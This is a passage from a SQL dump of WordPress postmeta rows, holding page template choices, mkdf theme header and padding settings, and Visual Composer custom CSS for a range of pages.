!important;}'),(52653,3046,'_dp_original','377'),(52654,3046,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52655,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52656,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52657,3047,'_wp_page_template','full-width.php'),(52658,3047,'slide_template','default'),(52659,3047,'_wpb_vc_js_status','true'),(52660,3047,'mkdf_page_content_behind_header_meta','no'),(52661,3047,'mkdf_disable_vertical_header_background_image_meta','no'),(52662,3047,'mkdf_disable_header_widget_areas_meta','no'),(52663,3047,'mkdf_show_title_area_meta','yes'),(52664,3047,'mkdf_title_area_type_meta','attika'),(52665,3047,'mkdf_menu_area_background_color_meta','#ffffff'),(52666,3047,'_dp_original','377'),(52667,3047,'mkdf_page_content_padding','80px 0 140px'),(52668,3047,'mkdf_page_content_padding_mobile','0px 0px 0px 0px'),(52669,3047,'_wpb_shortcodes_custom_css','.vc_custom_1535372522645{padding-right: 80px !important;padding-left: 80px !important;}'),(52670,3047,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(52671,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52672,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(52673,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52674,3048,'_wp_page_template','full-width.php'),(52675,3048,'slide_template','default'),(52676,3048,'_wpb_vc_js_status','true'),(52677,3048,'mkdf_page_content_behind_header_meta','no'),(52678,3048,'mkdf_disable_vertical_header_background_image_meta','no'),(52679,3048,'mkdf_disable_header_widget_areas_meta','no'),(52680,3048,'mkdf_page_content_padding','0'),(52681,3048,'mkdf_header_type_meta','header-divided'),(52682,3048,'mkdf_show_title_area_meta','no'),(52683,3048,'mkdf_menu_area_background_color_meta','#ffffff'),(52684,3048,'mkdf_menu_area_background_transparency_meta','1'),(52685,3048,'mkdf_menu_area_height_meta','80'),(52686,3048,'mkdf_disable_footer_meta','yes'),(52687,3048,'mkdf_header_behaviour_meta','fixed-on-scroll'),(52688,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(52689,3048,'_dp_original','351'),(52690,3049,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52691,3049,'_wp_page_template','full-width.php'),(52692,3049,'slide_template','default'),(52693,3049,'_wpb_vc_js_status','true'),(52694,3049,'mkdf_page_content_behind_header_meta','no'),(52695,3049,'mkdf_disable_vertical_header_background_image_meta','no'),(52696,3049,'mkdf_disable_header_widget_areas_meta','no'),(52697,3049,'_wpb_shortcodes_custom_css','.vc_custom_1535113284246{padding-top: 130px !important;}.vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}'),(52698,3049,'mkdf_page_content_padding','0'),(52699,3049,'mkdf_header_type_meta','header-divided'),(52700,3049,'mkdf_show_title_area_meta','no'),(52701,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52702,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(52703,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52704,3050,'_wp_page_template','full-width.php'),(52705,3050,'slide_template','default'),(52706,3050,'_wpb_vc_js_status','true'),(52707,3050,'mkdf_page_content_behind_header_meta','no'),(52708,3050,'mkdf_disable_vertical_header_background_image_meta','no'),(52709,3050,'mkdf_disable_header_widget_areas_meta','no'),(52710,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(52711,3050,'mkdf_page_content_padding','0'),(52712,3050,'mkdf_header_type_meta','header-divided'),(52713,3050,'_dp_original','430'),(52714,3050,'mkdf_show_title_area_meta','no'),(52715,3051,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52716,3051,'_wp_page_template','full-width.php'),(52717,3051,'slide_template','default'),(52718,3051,'_wpb_vc_js_status','true'),(52719,3051,'mkdf_page_content_behind_header_meta','no'),(52720,3051,'mkdf_disable_vertical_header_background_image_meta','no'),(52721,3051,'mkdf_disable_header_widget_areas_meta','no'),(52722,3051,'mkdf_show_title_area_meta','no'),(52723,3051,'mkdf_page_content_padding','0'),(52724,3051,'_wpb_shortcodes_custom_css','.vc_custom_1534508236123{padding-right: 0px !important;}'),(52725,3051,'mkdf_disable_footer_meta','yes'),(52726,3052,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52727,3052,'_wp_page_template','full-width.php'),(52728,3052,'slide_template','default'),(52729,3052,'_wpb_vc_js_status','true'),(52730,3052,'mkdf_page_content_behind_header_meta','no'),(52731,3052,'mkdf_page_content_padding','130px 0 0 '),(52732,3052,'mkdf_disable_vertical_header_background_image_meta','no'),(52733,3052,'mkdf_disable_header_widget_areas_meta','no'),(52734,3052,'mkdf_show_title_area_meta','no'),(52735,3052,'_wpb_shortcodes_custom_css','.vc_custom_1533721367903{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1534512863336{padding-left: 0px !important;}'),(52736,3053,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52737,3053,'_wp_page_template','full-width.php'),(52738,3053,'slide_template','default'),(52739,3053,'_wpb_vc_js_status','true'),(52740,3053,'mkdf_page_content_behind_header_meta','no'),(52741,3053,'mkdf_page_content_padding','0 0 0 0'),(52742,3053,'mkdf_page_content_padding_mobile','0 0 0 0'),(52743,3053,'mkdf_header_type_meta','header-minimal'),(52744,3053,'mkdf_disable_vertical_header_background_image_meta','no'),(52745,3053,'mkdf_disable_header_widget_areas_meta','no'),(52746,3053,'mkdf_show_title_area_meta','no'),(52747,3053,'mkdf_disable_footer_meta','yes'),(52748,3053,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(52749,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52750,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52751,3054,'_wp_page_template','full-width.php'),(52752,3054,'slide_template','default'),(52753,3054,'_wpb_vc_js_status','true'),(52754,3054,'mkdf_page_content_behind_header_meta','no'),(52755,3054,'mkdf_page_content_padding','110px 0 0 '),(52756,3054,'mkdf_disable_vertical_header_background_image_meta','no'),(52757,3054,'mkdf_disable_header_widget_areas_meta','no'),(52758,3054,'_dp_original','513'),(52759,3054,'mkdf_show_title_area_meta','no'),(52760,3054,'_wpb_shortcodes_custom_css','.vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}.vc_custom_1534508595924{margin-top: -130px !important;}'),(52761,3055,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52762,3055,'_wp_page_template','default'),(52763,3055,'slide_template','default'),(52764,3055,'_wpb_vc_js_status','true'),(52765,3055,'mkdf_page_content_behind_header_meta','no'),(52766,3055,'mkdf_disable_vertical_header_background_image_meta','no'),(52767,3055,'mkdf_disable_header_widget_areas_meta','no'),(52768,3055,'mkdf_show_title_area_meta','no'),(52769,3055,'mkdf_disable_footer_meta','yes'),(52770,3055,'mkdf_menu_area_in_grid_meta','yes'),(52771,3055,'mkdf_header_type_meta','header-minimal'),(52772,3055,'mkdf_page_content_padding','0 0 0 0'),(52773,3055,'mkdf_page_content_padding_mobile','0 0 0 0'),(52774,3055,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(52775,3441,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52776,3441,'_wp_page_template','full-width.php'),(52777,3441,'slide_template','default'),(52778,3441,'_wpb_vc_js_status','true'),(52779,3441,'mkdf_page_content_behind_header_meta','no'),(52780,3441,'mkdf_page_content_padding','0 0 0 0'),(52781,3441,'mkdf_page_content_padding_mobile','0 0 0 0'),(52782,3441,'mkdf_header_type_meta','header-vertical'),(52783,3441,'mkdf_disable_vertical_header_background_image_meta','no'),(52784,3441,'mkdf_disable_header_widget_areas_meta','no'),(52785,3441,'mkdf_show_title_area_meta','no'),(52786,3441,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(52787,3441,'mkdf_custom_header_widget_area_one_meta','left-menu'),(52788,3441,'mkdf_disable_footer_meta','yes'),(52789,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52790,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(52791,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52792,3057,'_wp_page_template','full-width.php'),(52793,3057,'slide_template','default'),(52794,3057,'_wpb_vc_js_status','true'),(52795,3057,'mkdf_page_content_behind_header_meta','no'),(52796,3057,'mkdf_page_content_padding','130px 0 0 '),(52797,3057,'mkdf_disable_vertical_header_background_image_meta','no'),(52798,3057,'mkdf_disable_header_widget_areas_meta','no'),(52799,3057,'mkdf_show_title_area_meta','no'),(52800,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(52801,3057,'_dp_original','513'),(52802,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52803,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52804,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52805,3058,'_wp_page_template','full-width.php'),(52806,3058,'slide_template','default'),(52807,3058,'_wpb_vc_js_status','true'),(52808,3058,'mkdf_page_content_behind_header_meta','no'),(52809,3058,'mkdf_page_content_padding','130px 0 0'),(52810,3058,'mkdf_disable_vertical_header_background_image_meta','no'),(52811,3058,'mkdf_disable_header_widget_areas_meta','no'),(52812,3058,'mkdf_show_title_area_meta','no'),(52813,3058,'_dp_original','744'),(52814,3058,'_wpb_shortcodes_custom_css','.vc_custom_1535445887028{padding-top: 140px !important;padding-bottom: 35px !important;}.vc_custom_1535445909857{padding-bottom: 200px !important;}.vc_custom_1535380918653{padding-bottom: 40px !important;}.vc_custom_1534240845257{padding-bottom: 30px !important;}.vc_custom_1535446084271{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534234226432{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535445707647{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535382774510{padding-right: 0px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1535447972496{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535447959496{margin-top: -15px !important;margin-left: -30px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}'),(52815,3058,'_wpb_post_custom_css','.mkdf-row-parallax-background-elements-holder.mkdf-parallax-elements-top .mkdf-row-parallax-right{\n    top: 1%;\n}'),(52816,4035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52817,4035,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(52818,4035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52819,4035,'_wp_page_template','full-width.php'),(52820,4035,'slide_template','default'),(52821,4035,'_wpb_vc_js_status','true'),(52822,4035,'mkdf_page_content_behind_header_meta','no'),(52823,4035,'mkdf_disable_vertical_header_background_image_meta','no'),(52824,4035,'mkdf_disable_header_widget_areas_meta','no'),(52825,4035,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(52826,4035,'mkdf_page_content_padding','0'),(52827,4035,'mkdf_header_type_meta','header-divided'),(52828,4035,'mkdf_show_title_area_meta','no'),(52829,4035,'_dp_original','430'),(52830,3060,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52831,3060,'_wp_page_template','full-width.php'),(52832,3060,'slide_template','default'),(52833,3060,'_wpb_vc_js_status','true'),(52834,3060,'mkdf_page_content_behind_header_meta','no'),(52835,3060,'mkdf_page_content_padding','0 0 0 0 '),(52836,3060,'mkdf_page_content_padding_mobile','0 0 0 0'),(52837,3060,'mkdf_set_menu_area_position_meta','center'),(52838,3060,'mkdf_disable_vertical_header_background_image_meta','no'),(52839,3060,'mkdf_menu_area_background_color_meta','#ffffff'),(52840,3060,'mkdf_menu_area_background_transparency_meta','0.4'),(52841,3060,'mkdf_disable_header_widget_areas_meta','no'),(52842,3060,'mkdf_show_title_area_meta','no'),(52843,3060,'mkdf_disable_footer_meta','yes'),(52844,3060,'mkdf_header_type_meta','header-standard'),(52845,3060,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(52846,3060,'mkdf_header_behaviour_meta','no-behavior'),(52847,3061,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52848,3061,'_wp_page_template','default'),(52849,3061,'slide_template','default'),(52850,3061,'_wpb_vc_js_status','false'),(52851,3061,'mkdf_page_content_behind_header_meta','no'),(52852,3061,'mkdf_disable_vertical_header_background_image_meta','no'),(52853,3061,'mkdf_disable_header_widget_areas_meta','no'),(52854,3062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52855,3062,'_wp_page_template','default'),(52856,3062,'slide_template','default'),(52857,3062,'_wpb_vc_js_status','true'),(52858,3062,'mkdf_page_content_behind_header_meta','no'),(52859,3062,'mkdf_page_content_padding','120px 0 160px 0'),(52860,3062,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(52861,3062,'mkdf_disable_vertical_header_background_image_meta','no'),(52862,3062,'mkdf_disable_header_widget_areas_meta','no'),(52863,3062,'mkdf_title_area_type_meta','attika'),(52864,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52865,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52866,3063,'_wp_page_template','default'),(52867,3063,'slide_template','default'),(52868,3063,'_wpb_vc_js_status','true'),(52869,3063,'mkdf_page_content_behind_header_meta','no'),(52870,3063,'mkdf_page_content_padding','122px 0 160px 0'),(52871,3063,'mkdf_page_content_padding_mobile','122px 0 160px 0'),(52872,3063,'mkdf_disable_vertical_header_background_image_meta','no'),(52873,3063,'mkdf_disable_header_widget_areas_meta','no'),(52874,3063,'mkdf_title_area_type_meta','attika'),(52875,3063,'_dp_original','1151'),(52876,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52877,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52878,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52879,3064,'_wp_page_template','full-width.php'),(52880,3064,'slide_template','default'),(52881,3064,'_wpb_vc_js_status','true'),(52882,3064,'mkdf_page_content_behind_header_meta','no'),(52883,3064,'mkdf_page_content_padding','30px 30px 50px 30px'),(52884,3064,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(52885,3064,'mkdf_disable_vertical_header_background_image_meta','no'),(52886,3064,'mkdf_disable_header_widget_areas_meta','no'),(52887,3064,'mkdf_title_area_type_meta','attika'),(52888,3064,'_dp_original','1160'),(52889,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52890,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52891,3065,'_wp_page_template','default'),(52892,3065,'slide_template','default'),(52893,3065,'_wpb_vc_js_status','true'),(52894,3065,'mkdf_page_content_behind_header_meta','no'),(52895,3065,'mkdf_page_content_padding','120px 0 170px 0'),(52896,3065,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(52897,3065,'mkdf_disable_vertical_header_background_image_meta','no'),(52898,3065,'mkdf_disable_header_widget_areas_meta','no'),(52899,3065,'mkdf_title_area_type_meta','attika'),(52900,3065,'_dp_original','1151'),(52901,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52902,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52903,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52904,3066,'_wp_page_template','default'),(52905,3066,'slide_template','default'),(52906,3066,'_wpb_vc_js_status','true'),(52907,3066,'mkdf_page_content_behind_header_meta','no'),(52908,3066,'mkdf_page_content_padding','100px 0 100px 0'),(52909,3066,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(52910,3066,'mkdf_disable_vertical_header_background_image_meta','no'),(52911,3066,'mkdf_disable_header_widget_areas_meta','no'),(52912,3066,'mkdf_title_area_type_meta','attika'),(52913,3066,'_dp_original','1160'),(52914,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52915,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52916,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52917,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52918,3067,'_wp_page_template','full-width.php'),(52919,3067,'slide_template','default'),(52920,3067,'_wpb_vc_js_status','true'),(52921,3067,'mkdf_page_content_behind_header_meta','no'),(52922,3067,'mkdf_page_content_padding','30px 30px 50px 30px'),(52923,3067,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(52924,3067,'mkdf_disable_vertical_header_background_image_meta','no'),(52925,3067,'mkdf_disable_header_widget_areas_meta','no'),(52926,3067,'mkdf_title_area_type_meta','attika'),(52927,3067,'_dp_original','1167'),(52928,3068,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52929,3068,'_wp_page_template','full-width.php'),(52930,3068,'slide_template','default'),(52931,3068,'_wpb_vc_js_status','true'),(52932,3068,'mkdf_page_content_behind_header_meta','no'),(52933,3068,'mkdf_page_content_padding','0 0 0 0'),(52934,3068,'mkdf_page_content_padding_mobile','0 0 0 0'),(52935,3068,'mkdf_disable_header_meta','yes'),(52936,3068,'mkdf_disable_vertical_header_background_image_meta','no'),(52937,3068,'mkdf_disable_header_widget_areas_meta','no'),(52938,3068,'mkdf_show_title_area_meta','no'),(52939,3068,'_wpb_shortcodes_custom_css','.vc_custom_1534251303879{background-color: #eff5f8 !important;}.vc_custom_1534849547927{margin-top: -1px !important;}.vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}.vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534848855900{padding-top: 0px !important;}.vc_custom_1534859739459{padding-top: 100px !important;}.vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}.vc_custom_1534927596297{margin-top: -500px !important;}.vc_custom_1534927611021{margin-top: -313px !important;}'),(52940,3068,'_wpb_post_custom_css','@media only screen and (min-width: 1025px) and (max-width: 1440px) {\n    #mkdf-back-to-top {\n        right: 55px; \n    }\n}'),(52941,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52942,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52943,3069,'_wp_page_template','full-width.php'),(52944,3069,'slide_template','default'),(52945,3069,'_wpb_vc_js_status','true'),(52946,3069,'mkdf_page_content_behind_header_meta','no'),(52947,3069,'mkdf_disable_vertical_header_background_image_meta','no'),(52948,3069,'mkdf_disable_header_widget_areas_meta','no'),(52949,3069,'mkdf_page_content_padding','80px 0 '),(52950,3069,'_dp_original','50'),(52951,3069,'_wpb_shortcodes_custom_css','.vc_custom_1534339141193{padding-bottom: 78px !important;}.vc_custom_1534253493197{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253549960{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253609963{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253600292{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253651419{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253670577{padding-top: 85px !important;}'),(52952,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52953,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52954,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52955,3070,'_wp_page_template','full-width.php'),(52956,3070,'slide_template','default'),(52957,3070,'_wpb_vc_js_status','true'),(52958,3070,'mkdf_page_content_behind_header_meta','no'),(52959,3070,'mkdf_disable_vertical_header_background_image_meta','no'),(52960,3070,'mkdf_disable_header_widget_areas_meta','no'),(52961,3070,'mkdf_page_content_padding','100px 0 110px'),(52962,3070,'_dp_original','1241'),(52963,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52964,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(52965,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52966,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52967,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52968,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(52969,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(52970,3071,'_wp_page_template','full-width.php'),(52971,3071,'slide_template','default'),(52972,3071,'_wpb_vc_js_status','true'),(52973,3071,'mkdf_page_content_behind_header_meta','no'),(52974,3071,'mkdf_disable_vertical_header_background_image_meta','no'),(52975,3071,'mkdf_disable_header_widget_areas_meta','no'),(52976,3071,'mkdf_page_content_padding','120px 0 140px'),(52977,3071,'_dp_original','1250'),(52978,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52979,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(52980,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52981,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52982,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52983,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52984,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(52985,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(52986,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(52987,3072,'_wp_page_template','full-width.php'),(52988,3072,'slide_template','default'),(52989,3072,'_wpb_vc_js_status','true'),(52990,3072,'mkdf_page_content_behind_header_meta','no'),(52991,3072,'mkdf_disable_vertical_header_background_image_meta','no'),(52992,3072,'mkdf_disable_header_widget_areas_meta','no'),(52993,3072,'mkdf_page_content_padding','100px 0 90px'),(52994,3072,'_dp_original','1297'),(52995,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52996,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(52997,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52998,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52999,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53000,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53001,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(53002,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(53003,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(53004,1382,'_wp_page_template','full-width.php'),(53005,1382,'slide_template','default'),(53006,1382,'_wpb_vc_js_status','true'),(53007,1382,'mkdf_page_content_behind_header_meta','no'),(53008,1382,'mkdf_disable_vertical_header_background_image_meta','no'),(53009,1382,'mkdf_disable_header_widget_areas_meta','no'),(53010,1382,'mkdf_page_content_padding','120px 0 